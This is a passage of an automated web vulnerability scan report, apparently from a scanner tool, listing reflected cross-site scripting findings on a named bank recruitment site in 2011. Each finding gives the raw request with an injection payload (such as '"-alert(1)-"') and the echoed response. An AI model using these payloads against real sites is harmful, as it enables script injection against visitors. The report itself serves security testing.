Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:30 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 57801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Disabil
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/divers_disability.php?751d7"><a>c6825584c86=1" />
...[SNIP]...

1.41. http://www.mycreditagricole.jobs/divers_disability.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /divers_disability.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b3cb"-alert(1)-"aefdd7a1ad8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /divers_disability.php?9b3cb"-alert(1)-"aefdd7a1ad8=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:53 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:53 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 57822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Disabil
...[SNIP]...
Agricole Recruitment Group";
var SharingBaseTitle = "Disability - Diversity - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/divers_disability.php?9b3cb"-alert(1)-"aefdd7a1ad8=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.42. http://www.mycreditagricole.jobs/divers_microfinance.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /divers_microfinance.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48f99"><a>4e5f565cbde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /divers_microfinance.php?48f99"><a>4e5f565cbde=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:35 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:35 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Microfi
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/divers_microfinance.php?48f99"><a>4e5f565cbde=1" />
...[SNIP]...

1.43. http://www.mycreditagricole.jobs/divers_microfinance.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /divers_microfinance.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4297a"-alert(1)-"dcab507ba6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /divers_microfinance.php?4297a"-alert(1)-"dcab507ba6f=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:56 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:56 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Microfi
...[SNIP]...
icole Recruitment Group";
var SharingBaseTitle = "Microfinance - Diversity - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/divers_microfinance.php?4297a"-alert(1)-"dcab507ba6f=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.44. http://www.mycreditagricole.jobs/diversity.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /diversity.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17ed4"><a>2b7a560ac9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /diversity.php?17ed4"><a>2b7a560ac9b=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:27 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:27 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 55313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Diversi
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/diversity.php?17ed4"><a>2b7a560ac9b=1" />
...[SNIP]...

1.45. http://www.mycreditagricole.jobs/diversity.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /diversity.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9faa"-alert(1)-"444927dcdcd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /diversity.php?f9faa"-alert(1)-"444927dcdcd=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:52 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:52 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 55334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Diversi
...[SNIP]...
"Diversity - Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "Diversity - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/diversity.php?f9faa"-alert(1)-"444927dcdcd=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.46. http://www.mycreditagricole.jobs/entities.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /entities.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae90d"><a>cca70f4caad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entities.php?ae90d"><a>cca70f4caad=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:23 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:23 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Cr..dit
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/entities.php?ae90d"><a>cca70f4caad=1" />
...[SNIP]...

1.47. http://www.mycreditagricole.jobs/entities.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /entities.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67a7a"-alert(1)-"44178014737 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entities.php?67a7a"-alert(1)-"44178014737=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:43 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:43 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Cr..dit
...[SNIP]...
Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "Our entities - About us - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/entities.php?67a7a"-alert(1)-"44178014737=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/images_entites/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http://ww
...[SNIP]...

1.48. http://www.mycreditagricole.jobs/etudiants.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /etudiants.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b29a"><a>7803bba0e43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /etudiants.php?9b29a"><a>7803bba0e43=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:39 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:40 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 38785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="fr">
<head>
<title>Espace
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/etudiants.php?9b29a"><a>7803bba0e43=1" />
...[SNIP]...

1.49. http://www.mycreditagricole.jobs/etudiants.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /etudiants.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a65e"-alert(1)-"759dadd77ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /etudiants.php?9a65e"-alert(1)-"759dadd77ad=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:01 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:01 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 38806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="fr">
<head>
<title>Espace
...[SNIP]...
ts - Groupe Cr..dit Agricole Recrutement";
var SharingBaseTitle = "Espace Etudiants - Groupe Cr..dit Agricole Recrutement";
var SharingUrl = "http://www.recrutement.credit-agricole.com/etudiants.php?9a65e"-alert(1)-"759dadd77ad=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.50. http://www.mycreditagricole.jobs/exp_forums.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /exp_forums.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e2e9"><a>c3b8a15dadd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /exp_forums.php?4e2e9"><a>c3b8a15dadd=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:30 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:30 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 63838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Forums
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/exp_forums.php?4e2e9"><a>c3b8a15dadd=1" />
...[SNIP]...

1.51. http://www.mycreditagricole.jobs/exp_forums.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /exp_forums.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload befb5"-alert(1)-"2525d2989e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /exp_forums.php?befb5"-alert(1)-"2525d2989e1=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:58 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:58 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 63859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Forums
...[SNIP]...
- Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "Forums - Experienced - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/exp_forums.php?befb5"-alert(1)-"2525d2989e1=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.52. http://www.mycreditagricole.jobs/exp_key_figures.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /exp_key_figures.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26fc5"-alert(1)-"b5133ec876c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /exp_key_figures.php?26fc5"-alert(1)-"b5133ec876c=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:54 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:54 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Key fig
...[SNIP]...
Agricole Recruitment Group";
var SharingBaseTitle = "Key figures - Experienced - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/exp_key_figures.php?26fc5"-alert(1)-"b5133ec876c=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.53. http://www.mycreditagricole.jobs/exp_key_figures.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /exp_key_figures.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7045a"><a>ce23c0ca00b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /exp_key_figures.php?7045a"><a>ce23c0ca00b=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:29 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:29 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Key fig
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/exp_key_figures.php?7045a"><a>ce23c0ca00b=1" />
...[SNIP]...

1.54. http://www.mycreditagricole.jobs/exp_requirement.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /exp_requirement.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61a53"><a>70825bbfb65 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /exp_requirement.php?61a53"><a>70825bbfb65=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:15 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:15 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Join us
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/exp_requirement.php?61a53"><a>70825bbfb65=1" />
...[SNIP]...

1.55. http://www.mycreditagricole.jobs/exp_requirement.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /exp_requirement.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66666"-alert(1)-"094865254aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /exp_requirement.php?66666"-alert(1)-"094865254aa=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:45 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:45 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Join us
...[SNIP]...
dit Agricole Recruitment Group";
var SharingBaseTitle = "Join us - Experienced - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/exp_requirement.php?66666"-alert(1)-"094865254aa=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.56. http://www.mycreditagricole.jobs/exp_requirement_finance.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /exp_requirement_finance.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3db45"-alert(1)-"70d4da21c3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /exp_requirement_finance.php?3db45"-alert(1)-"70d4da21c3e=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
